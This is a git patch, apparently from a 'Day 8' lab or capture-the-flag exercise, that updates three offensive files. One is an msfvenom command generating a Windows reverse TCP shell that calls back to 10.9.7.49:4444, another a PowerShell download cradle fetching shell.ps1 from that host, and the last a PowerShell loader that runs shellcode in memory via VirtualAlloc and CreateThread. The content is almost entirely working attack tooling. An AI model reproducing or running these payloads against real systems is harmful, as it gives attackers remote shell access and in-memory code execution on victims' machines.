From 2fbdc476ce6ee74d595436c47d17db5d3385701e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sivert=20V=2E=20S=C3=A6ther?= <git@sivert.pw>
Date: Wed, 11 Dec 2024 22:05:18 +0100
Subject: [PATCH] Day 8 updates

---
 8/download.ps1 |  1 +
 8/shell.ps1    | 21 ++++++---------------
 8/venom.sh     |  2 +-
 3 files changed, 8 insertions(+), 16 deletions(-)
 create mode 100644 8/download.ps1

diff --git a/8/download.ps1 b/8/download.ps1
new file mode 100644
index 0000000..0d820bb
--- /dev/null
+++ b/8/download.ps1
@@ -0,0 +1 @@
+(New-Object System.Net.WebClient).DownloadData('http://10.9.7.49:8000/shell.ps1')
diff --git a/8/shell.ps1 b/8/shell.ps1
index ce83413..ae2ea65 100644
--- a/8/shell.ps1
+++ b/8/shell.ps1
@@ -1,40 +1,31 @@
-$Buf = 
+[Byte[]] $buf = 
 $VrtAlloc = @"
 using System;
 using System.Runtime.InteropServices;
-
 public class VrtAlloc{
     [DllImport("kernel32")]
-    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
+    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 }
 "@
-
 Add-Type $VrtAlloc 
-
 $WaitFor= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class WaitFor{
  [DllImport("kernel32.dll", SetLastError=true)]
-    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
+    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
 }
 "@
-
 Add-Type $WaitFor
-
 $CrtThread= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class CrtThread{
- [DllImport("kernel32", CharSet=CharSet.Ansi)]
-    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-  
+[DllImport("kernel32", CharSet=CharSet.Ansi)]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 }
 "@
-Add-Type $CrtThread   
-
+Add-Type $CrtThread
 [IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
 $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
diff --git a/8/venom.sh b/8/venom.sh
index 655354e..1cfc910 100755
--- a/8/venom.sh
+++ b/8/venom.sh
@@ -1 +1 @@
-msfvenom -p windows/x64/shell_reverse_tcp LHOST="$1" LPORT=1337 -f powershell
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.7.49 LPORT=4444 -f powershell